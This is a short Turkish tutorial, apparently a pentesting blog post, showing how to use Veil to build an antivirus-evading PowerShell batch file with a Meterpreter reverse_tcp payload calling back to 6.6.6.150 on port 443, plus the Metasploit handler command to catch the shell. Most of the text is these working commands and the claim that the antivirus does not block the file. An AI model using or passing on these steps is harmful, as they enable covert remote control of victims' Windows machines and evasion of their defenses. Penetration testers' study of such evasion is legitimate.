Penetrasyon testlerinde sıklıkla antivirus uygulamalarının atlatılması ihtiyacı doğmaktadır. Çeşitli encoding yöntemleri kullanılarak antivirus yazılımları atlatılabilmektedir. Msfpayload, Msfencode, Msfvenom benzeri yazılımlar ile istenilen özelliklerde zararlı yazılım üretmek mümkündür. Aşağıda bunlara alternatif ve oldukça başarılı bir uygulama olan VEIL ile bu işlemin nasıl gerçekleştirilebileceğine değinilmiştir.
Windows işletim sistemleri üzerinde çalışan antiviruslere yakalanmayan batch file oluşturmak için aşağıda ki ilgili komutları çalıştırması yeterlidir. 6.6.6.150 ipsine 443 portu üzerinden reverse bağlantı kurarak erişim sağlanacaktır.
Öncelikle aşağıdaki komut kullanılarak batch file oluşturulabilir. İlgili komut çalıştırıldıktan sonra .bat uzantılı zararlı uygulamamız oluşmuş olacaktır.
root@kali:# veil -l powershell -p VirtualAlloc -o undetectable –msfpayload windows/meterpreter/reverse_tcp –msfoptions LHOST=6.6.6.150 LPORT=443
Windows üzerinde batch dosyasını çalıştırmadan önce lokal makinamızda 443 portu metasploit ile dinleme moduna alıyoruz.
Aşağıdaki komut ile 443 portunun dinleme moduna alınması sağlanmıştır. Payload olarak reverse_tcp kullanılmıştır.
root@kali:# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=6.6.6.150 LPORT=443 E
Windows üzerinde undetectable.bat dosyamızı çalıştırıyoruz. Çalıştırmamızla birlikle meterpreter shell bizi karşılıyor.
Zararlının çalıştırıldığı sistem üzerindeki antivirüsün zararlıyla ilgili herhangi bir bloklama işlemi gerçekleştirmediği aşağıda görülebilmektedir.
Bu şekilde antivirüs atlatılarak mevcut sisteme en üst seviyede erişim sağlanmış olacaktır.
Yazan: Özer GÖKER
